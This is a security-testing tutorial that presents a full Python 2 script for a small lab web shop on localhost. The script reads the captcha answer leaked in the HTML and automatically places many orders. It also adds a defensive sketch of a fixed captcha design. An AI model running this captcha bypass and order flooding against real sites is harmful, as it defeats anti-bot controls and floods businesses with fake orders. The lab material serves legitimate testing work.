Automating Stuff with Python

What is Automation?

Automation is the use of a machine or computer to perform a task efficiently and in much less time.

Why do we need automated scripts?

Humans can do great things, but sometimes we are too lazy to do some of them. For example, if I ask you to multiply 345*246, most of you will open the calculator on your device rather than solve it with pen and paper. Automated scripts make our tasks easier and less time-consuming.

Ever wondered why we need automated scripts in security testing?

If so, the answer to your question is here. While performing security testing you come across tasks that need to be done many times, like placing 1 lakh orders to check whether the application can be flooded with requests. Sitting and creating each and every request manually would be a very tough job, so here we can use automated scripts to do the job.

Why Python?

Python is a very powerful language with many libraries. We can perform many powerful tasks using Python and its libraries, so we do not need to write lengthy code to perform a small task.

We have crafted a small web application with an order placement feature.

The user needs to select the quantity of each item and can then place the order.

Request

Response

Confirmation Page containing captcha

Request

Response

On filling the delivery address, phone number and solving captcha we can successfully place an order.

Application Challenge: Your task here is to place multiple orders, say about 100. How will you do this? I am sure you won’t be solving the captcha yourself and filling in the form each time. But yes, you can write an automated script to do this.

Before starting with automation, let’s have a look at the captcha code. The feature is protected by a captcha, so to automate order placement we need to crack it. The captcha is a 6-digit numeric code, so brute forcing it will take a lot of time. But wait, there is something fishy here.

Yeah, we got the captcha code in the HTML body. So we can now parse the HTML response and extract this code, which allows us to automate the task.
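Seen from the defending side, the flaw is that the expected answer reaches the browser at all. The following Python 3 sketch is an added example, not code from the application or from this post: it contrasts a renderer that leaks the answer in a `php?rand=` URL with one that keeps it in the server-side session, and adds a single-use verifier and a response audit. The `captcha.php` file name, the session dict and all function names are assumptions made for illustration.

```python
import hmac
import re
import secrets


def new_code():
    """Six-digit numeric code, the same shape as the captcha in this post."""
    return "%06d" % secrets.randbelow(10 ** 6)


def render_leaky(session):
    """Flawed design: the expected answer travels in the image URL."""
    session["captcha"] = new_code()
    # 'captcha.php' is an assumed file name; the post only shows 'php?rand=<digits>'.
    return '<img src="captcha.php?rand=%s">' % session["captcha"]


def render_fixed(session):
    """The answer stays in the server-side session; the markup carries no secret."""
    session["captcha"] = new_code()
    return '<img src="captcha.php">'  # image is drawn server-side from the session


def verify(session, submitted):
    """Single-use check: every attempt, right or wrong, consumes the stored answer."""
    expected = session.pop("captcha", None)
    if expected is None:
        return False
    return hmac.compare_digest(expected.encode(), str(submitted).encode())


def audit_page(html, session):
    """Regression check to run against every response that shows a captcha."""
    findings = []
    answer = session.get("captcha")
    if answer and answer in html:
        findings.append("expected answer present in response body")
    if re.search(r"php\?rand=\d+", html):
        findings.append("numeric rand= parameter in a URL")
    return findings


if __name__ == "__main__":
    for name, render in (("leaky", render_leaky), ("fixed", render_fixed)):
        session = {}  # constructed stand-in for a server-side session store
        print(name, audit_page(render(session), session))
```

Because `verify` discards the stored answer on every attempt, a wrong guess forces a fresh captcha, so the 6-digit space cannot be walked against a single challenge.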

Let’s begin with the automation. We will follow the steps below.

  1. Write code for the option parser. We can use the option parser to create options for our script.
  2. Write code for using a proxy, so that each and every request and response passes through the proxy and is recorded there.
  3. Write code for performing a GET or POST request.
  4. Write code for parsing the response and extracting the captcha code from it.

We can use the code below for the option parser:

```python
from optparse import OptionParser

# Usage help summary
usage = "./%prog [] -p [proxy] "
usage += "\nExample: ./%prog -p localhost:8080 "

# Parser options
parser = OptionParser(usage=usage)
parser.add_option("-p", type="string", action="store", dest="proxy", help="HTTP Proxy ")
(options, args) = parser.parse_args()
```

After setting up the option parser, we can write the code for using a proxy with the script.

```python
import socket
import sys
import urllib2

# Proxy handler
def getProxy():
    try:
        proxy_handler = urllib2.ProxyHandler({'http': options.proxy})
    except socket.timeout:
        print("\tProxy timed out...\n\n")
        sys.exit(1)
    return proxy_handler

# Test proxy connection
def testProxy():
    print("[+] Testing proxy @ %s..." % (options.proxy))
    opener = urllib2.build_opener(getProxy())
    try:
        check = opener.open("http://www.google.com").read()
    except Exception:
        check = ""
    # A non-empty body means the request went through the proxy
    if check:
        print("\tProxy is found to be working...\n\n")
    else:
        print("\tProxy failed... Exiting!\n\n")
        sys.exit(1)
```

Performing POST request

```python
opener = urllib2.build_opener(getProxy(), urllib2.HTTPCookieProcessor(cj))
# Request sent to server containing Host, Request body and request headers
req = urllib2.Request(targetURL, data, headers={})
check = opener.open(req).read()
```

Now the basic work is done. We have a script with an option parser and proxy support that can send requests to the server and receive its responses.

Our next step is to customize this script for our task, so we send the request below to the server.

```python
targetURL = "http://127.0.0.1/blog/index.php"  # Captcha page URL
# Request body for captcha page
data = "margherita=1&dblcheese=1&farmhouse=2&peppy=1&mexican=3&veggie=3&pepper=1&paradise=1"
respHTML = postServerResponse(cj, targetURL, data)  # Performing POST request
```

Parse the response and get captcha code from it.

```python
captcha = re.search(r"(php\?rand=)(\d+)", respHTML)
```

Now, with this captcha code, we send another POST request to the server.

```python
targetURL1 = "http://127.0.0.1/blog/checkout.php"  # Captcha is submitted to this URL
# Request body for order placement
data1 = "margherita=1&dblcheese=1&farmhouse=2&peppy=1&mexican=3&veggie=3&pepper=1&paradise=1&address=sdassdce&phn=" + str(rand) + "&city=sdcefv&state=rferv&captcha_code=" + captcha.group(2)
respHTML1 = postServerResponse(cj, targetURL1, data1)
```

Parse the new response to get the order id of the successfully placed order.

```python
if re.search("successfully", respHTML1):
    id1 = re.search(r"(order id )(\d+)", respHTML1)
    print("Order Placed successfully with order id: " + id1.group(2))
else:
    print("Order Not Placed")
```

Combining all the modules, we get the script below:

```python
#!/usr/bin/python
# Import Starts
import sys
import socket
import urllib
import re
import urllib2
import string
import time
import httplib
import random
from optparse import OptionParser
from cookielib import CookieJar
# Import Ends

# Usage help summary
usage = "./%prog [] -p [proxy] "
usage += "\nExample: ./%prog -p localhost:8080 "

# Parser options
parser = OptionParser(usage=usage)
parser.add_option("-p", type="string", action="store", dest="proxy", help="HTTP Proxy ")
(options, args) = parser.parse_args()

# Proxy handler
def getProxy():
    try:
        proxy_handler = urllib2.ProxyHandler({'http': options.proxy})
    except socket.timeout:
        print("\tProxy timed out...\n\n")
        sys.exit(1)
    return proxy_handler

# Test proxy connection
def testProxy():
    print("[+] Testing proxy @ %s..." % (options.proxy))
    opener = urllib2.build_opener(getProxy())
    try:
        check = opener.open("http://www.google.com").read()
    except Exception:
        check = ""
    # A non-empty body means the request went through the proxy
    if check:
        print("\tProxy is found to be working...")
    else:
        print("\tProxy failed... Exiting!")
        sys.exit(1)

# Post data to server using POST request
def postServerResponse(cj, targetURL, data):
    if options.proxy:
        try:
            opener = urllib2.build_opener(getProxy(), urllib2.HTTPCookieProcessor(cj))
            # Request sent to server containing Host, Request body and request headers
            req = urllib2.Request(targetURL, data, headers={})
            check = opener.open(req).read()
            return check
        except Exception:
            print("\tProxy connection failed to remote target...")
            sys.exit(1)
    else:
        try:
            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
            req = urllib2.Request(targetURL, data, headers={})
            check = opener.open(req).read()
            return check
        except Exception:
            print("\tTarget connection failed, check your address...")
            sys.exit(1)

# Try to place order
def placeOrder():
    cj = CookieJar()
    targetURL = "http://127.0.0.1/blog/index.php"  # Captcha page URL
    targetURL1 = "http://127.0.0.1/blog/checkout.php"  # Captcha is submitted to this URL
    # Request body for captcha page
    data = "margherita=1&dblcheese=1&farmhouse=2&peppy=1&mexican=3&veggie=3&pepper=1&paradise=1"
    respHTML = postServerResponse(cj, targetURL, data)
    captcha = re.search(r"(php\?rand=)(\d+)", respHTML)
    if captcha:
        rand = random.randint(7000000000, 9999999999)
        # Request body for order placement
        data1 = "margherita=1&dblcheese=1&farmhouse=2&peppy=1&mexican=3&veggie=3&pepper=1&paradise=1&address=sdassdce&phn=" + str(rand) + "&city=sdcefv&state=rferv&captcha_code=" + captcha.group(2)
        respHTML1 = postServerResponse(cj, targetURL1, data1)
        if re.search("successfully", respHTML1):
            id1 = re.search(r"(order id )(\d+)", respHTML1)
            print("Order Placed successfully with order id: " + id1.group(2))
        else:
            print("Order Not Placed")
    else:
        print("Captcha not found")

# Main function
def main():
    # Check and connect proxy server if specified using -p argument
    if options.proxy:
        testProxy()
    print("\n[+] Running Test...")
    # raw_input() plus int(): Python 2's input() would eval() whatever is typed
    loop = int(raw_input("Enter number of orders to be placed:"))
    for i in range(0, loop):
        placeOrder()
    print("\n[+] Automated Order Placement. Have fun!...")

if __name__ == "__main__":
    main()
```

Below is a screenshot of the script placing 30 orders:
